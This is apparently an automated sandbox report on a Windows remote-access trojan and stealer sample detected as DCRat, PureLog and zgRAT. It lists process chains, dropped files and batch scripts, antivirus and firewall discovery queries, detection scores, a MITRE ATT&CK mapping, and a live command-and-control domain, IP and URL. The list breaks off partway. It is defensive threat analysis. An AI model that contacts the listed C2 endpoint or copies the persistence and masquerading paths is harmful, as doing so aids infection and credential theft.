Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Queries volume information: C:\Users\user\Desktop\vb8DOBZQ4X.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2366679350.000000001B5C0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2486802519.000000001C42C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s Defender\MsMpeng.exe
Source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1984195109.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C410000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2207860586.000000001C1E1000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2366679350.000000001B5C0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2486802519.000000001C42C000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2589006306.000000001BFB0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2747569027.000000001BF70000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2901945527.000000001C010000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3024530595.000000001CBBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vb8DOBZQ4X.exe PID: 6580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GSwhJpqdkmruXxiphyV.exe PID: 5700, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: vb8DOBZQ4X.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vb8DOBZQ4X.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1682176987.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: vb8DOBZQ4X.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vb8DOBZQ4X.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vb8DOBZQ4X.exe PID: 6580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GSwhJpqdkmruXxiphyV.exe PID: 5700, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: vb8DOBZQ4X.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vb8DOBZQ4X.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1682176987.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: vb8DOBZQ4X.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vb8DOBZQ4X.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Saved Games\OfficeClickToRun.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	11 Process Injection	12 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	161 Virtualization/Sandbox Evasion	Security Account Manager	161 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vb8DOBZQ4X.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
vb8DOBZQ4X.exe	59%	Virustotal		Browse
vb8DOBZQ4X.exe	100%	Avira	HEUR/AGEN.1323342
vb8DOBZQ4X.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\AqtFBGCA.log	100%	Avira	TR/AVI.Agent.updqb
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BHGUMQKM.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BlGuwWUx.log	100%	Avira	TR/Agent.jbwuj
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BuzfybGV.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat	100%	Avira	BAT/Delbat.C
C:\Users\Default\Saved Games\OfficeClickToRun.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\AxYXcbrb.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\BuzfybGV.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\BoVNXGRv.log	100%	Joe Sandbox ML
C:\Users\Default\Saved Games\OfficeClickToRun.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Sidebar\GSwhJpqdkmruXxiphyV.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Sidebar\Gadgets\GSwhJpqdkmruXxiphyV.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\Saved Games\OfficeClickToRun.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AGiVvpLm.log	25%	ReversingLabs
C:\Users\user\Desktop\AnBXspYe.log	21%	ReversingLabs
C:\Users\user\Desktop\AqtFBGCA.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AxYXcbrb.log	5%	ReversingLabs
C:\Users\user\Desktop\BHGUMQKM.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BlGuwWUx.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\BoVNXGRv.log	21%	ReversingLabs
C:\Users\user\Desktop\BspVIDPh.log	21%	ReversingLabs
C:\Users\user\Desktop\BuzfybGV.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\CGYwsYXe.log	17%	ReversingLabs
C:\Users\user\Desktop\CVklKbNA.log	29%	ReversingLabs
C:\Users\user\Desktop\CdYNaVtP.log	8%	ReversingLabs
C:\Users\user\Desktop\CmCLCTge.log	8%	ReversingLabs
C:\Users\user\Desktop\CoiFKLru.log	8%	ReversingLabs
C:\Users\user\Desktop\CuOMrhud.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DCRfugzr.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\DeVdhSGw.log	12%	ReversingLabs
C:\Users\user\Desktop\DnOOjYsU.log	9%	ReversingLabs
C:\Users\user\Desktop\DoxmDQeC.log	25%	ReversingLabs
C:\Users\user\Desktop\EcmNwYns.log	21%	ReversingLabs
C:\Users\user\Desktop\EkqWFYHP.log	8%	ReversingLabs
C:\Users\user\Desktop\EzneeVJd.log	25%	ReversingLabs
C:\Users\user\Desktop\FHqnnVdz.log	8%	ReversingLabs
C:\Users\user\Desktop\FOzUwYyz.log	17%	ReversingLabs
C:\Users\user\Desktop\FeLEeCSo.log	17%	ReversingLabs
C:\Users\user\Desktop\FuAUYlaa.log	17%	ReversingLabs
C:\Users\user\Desktop\FvgOgdlp.log	21%	ReversingLabs
C:\Users\user\Desktop\FxxLTNKF.log	25%	ReversingLabs
C:\Users\user\Desktop\GBZNzENY.log	17%	ReversingLabs
C:\Users\user\Desktop\GLflDjTD.log	8%	ReversingLabs
C:\Users\user\Desktop\GTPDiSuI.log	21%	ReversingLabs
C:\Users\user\Desktop\GYueqmCN.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GhHLDCKr.log	5%	ReversingLabs
C:\Users\user\Desktop\GrbctlpV.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\GyndizDU.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\HejUYCZm.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\HzekDlJr.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IEuUpfEB.log	9%	ReversingLabs
C:\Users\user\Desktop\IhuDGjiQ.log	8%	ReversingLabs
C:\Users\user\Desktop\ImrlTNzS.log	17%	ReversingLabs
C:\Users\user\Desktop\IrnfaqBK.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\IySxBMpl.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\JcGsBzAN.log	8%	ReversingLabs
C:\Users\user\Desktop\JgaLgwjq.log	25%	ReversingLabs
C:\Users\user\Desktop\JjTtpNNN.log	8%	ReversingLabs
C:\Users\user\Desktop\JmWFnalj.log	17%	ReversingLabs
C:\Users\user\Desktop\KBRTYUOn.log	21%	ReversingLabs
C:\Users\user\Desktop\KeYvlRxi.log	12%	ReversingLabs
C:\Users\user\Desktop\KsQEGBOR.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LLCKvMGi.log	21%	ReversingLabs
C:\Users\user\Desktop\LVVbmwlM.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LieVinBD.log	8%	ReversingLabs
C:\Users\user\Desktop\MEDBuDSi.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\MXCVunwb.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\MitCbspL.log	12%	ReversingLabs
C:\Users\user\Desktop\NNotRvLd.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NZJkwJOG.log	21%	ReversingLabs
C:\Users\user\Desktop\NZaMcRbY.log	29%	ReversingLabs
C:\Users\user\Desktop\NlkveJFZ.log	8%	ReversingLabs
C:\Users\user\Desktop\OcccncZk.log	8%	ReversingLabs
C:\Users\user\Desktop\PKGckfmR.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Name	IP	Active	Malicious	Antivirus Detection	Reputation
228472cm.n9shka.top	37.44.238.250	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vb8DOBZQ4X.exe, 00000000.00000002.1736281851.0000000003053000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.0000000003023000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.0000000003284000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.00000000037CA000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.000000000373B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://228472cm.n9shka.top	GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.0000000003023000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.0000000003284000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.00000000037CA000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.000000000398A000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, 